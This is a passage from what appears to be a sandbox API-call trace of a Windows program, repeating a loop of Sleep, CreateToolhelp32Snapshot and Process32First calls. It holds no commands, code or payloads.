(dwMilliseconds=0x64) [0305.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.960] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.046] Sleep (dwMilliseconds=0x64) [0306.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0306.072] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.179] Sleep (dwMilliseconds=0x64) [0306.184] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0306.232] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.351] Sleep (dwMilliseconds=0x64) [0306.353] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0306.371] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.473] Sleep (dwMilliseconds=0x64) [0306.477] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0306.501] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.597] Sleep (dwMilliseconds=0x64) [0306.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0306.619] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.717] Sleep (dwMilliseconds=0x64) [0306.721] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0306.740] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.845] Sleep (dwMilliseconds=0x64) [0306.847] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0306.860] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.191] Sleep (dwMilliseconds=0x64) [0307.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0307.272] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.362] Sleep (dwMilliseconds=0x64) [0307.366] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0307.383] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.470] Sleep (dwMilliseconds=0x64) [0307.473] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0307.487] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.579] Sleep (dwMilliseconds=0x64) [0307.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0307.595] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.681] Sleep (dwMilliseconds=0x64) [0307.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0307.700] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.775] Sleep (dwMilliseconds=0x64) [0307.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0307.796] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.885] Sleep (dwMilliseconds=0x64) [0307.886] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0307.903] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.049] Sleep (dwMilliseconds=0x64) [0308.052] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0308.132] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.248] Sleep (dwMilliseconds=0x64) [0308.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0308.266] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.356] Sleep (dwMilliseconds=0x64) [0308.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0308.373] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.188] Sleep (dwMilliseconds=0x64) [0309.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0309.234] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.346] Sleep (dwMilliseconds=0x64) [0309.347] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0309.359] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.427] Sleep (dwMilliseconds=0x64) [0309.429] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0309.441] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.508] Sleep (dwMilliseconds=0x64) [0309.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0309.523] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.602] Sleep (dwMilliseconds=0x64) [0309.604] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0309.616] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.685] Sleep (dwMilliseconds=0x64) [0309.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0309.703] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.821] Sleep (dwMilliseconds=0x64) [0309.823] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0309.841] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.923] Sleep (dwMilliseconds=0x64) [0309.924] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0309.946] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.015] Sleep (dwMilliseconds=0x64) [0310.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0310.032] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.184] Sleep (dwMilliseconds=0x64) [0310.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0310.199] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.323] Sleep (dwMilliseconds=0x64) [0310.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0310.352] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.493] Sleep (dwMilliseconds=0x64) [0310.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0310.520] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.613] Sleep (dwMilliseconds=0x64) [0310.614] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0310.631] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.738] Sleep (dwMilliseconds=0x64) [0310.740] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0310.763] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.898] Sleep (dwMilliseconds=0x64) [0310.899] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0310.916] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.015] Sleep (dwMilliseconds=0x64) [0311.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0311.031] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.162] Sleep (dwMilliseconds=0x64) [0311.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0311.197] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.273] Sleep (dwMilliseconds=0x64) [0311.275] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0311.289] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.387] Sleep (dwMilliseconds=0x64) [0311.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4c [0311.409] Process32First (in: hSnapshot=0x1f4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.497] Sleep (dwMilliseconds=0x64) [0311.522] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0311.542] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.675] Sleep (dwMilliseconds=0x64) [0311.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0311.699] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.861] Sleep (dwMilliseconds=0x64) [0311.865] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0311.885] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.971] Sleep (dwMilliseconds=0x64) [0311.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0311.990] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.133] Sleep (dwMilliseconds=0x64) [0312.135] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0312.154] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.252] Sleep (dwMilliseconds=0x64) [0312.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0312.271] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.374] Sleep (dwMilliseconds=0x64) [0312.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0312.395] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.476] Sleep (dwMilliseconds=0x64) [0312.478] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0312.495] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.582] Sleep (dwMilliseconds=0x64) [0312.589] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0312.613] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.734] Sleep (dwMilliseconds=0x64) [0312.736] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0312.753] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.006] Sleep (dwMilliseconds=0x64) [0313.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.034] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.150] Sleep (dwMilliseconds=0x64) [0313.156] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.173] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.279] Sleep (dwMilliseconds=0x64) [0313.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.295] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.364] Sleep (dwMilliseconds=0x64) [0313.366] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.382] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.455] Sleep (dwMilliseconds=0x64) [0313.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.470] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.550] Sleep (dwMilliseconds=0x64) [0313.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.575] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.671] Sleep (dwMilliseconds=0x64) [0313.672] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.688] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.783] Sleep (dwMilliseconds=0x64) [0313.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.840] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.934] Sleep (dwMilliseconds=0x64) [0313.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0313.959] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.099] Sleep (dwMilliseconds=0x64) [0314.101] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0314.120] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.218] Sleep (dwMilliseconds=0x64) [0314.220] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0314.235] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.332] Sleep (dwMilliseconds=0x64) [0314.335] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0314.356] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.448] Sleep (dwMilliseconds=0x64) [0314.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a8 [0314.466] Process32First (in: hSnapshot=0x23a8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.563] Sleep (dwMilliseconds=0x64) [0314.566] CreateToolhelp32Snapshot 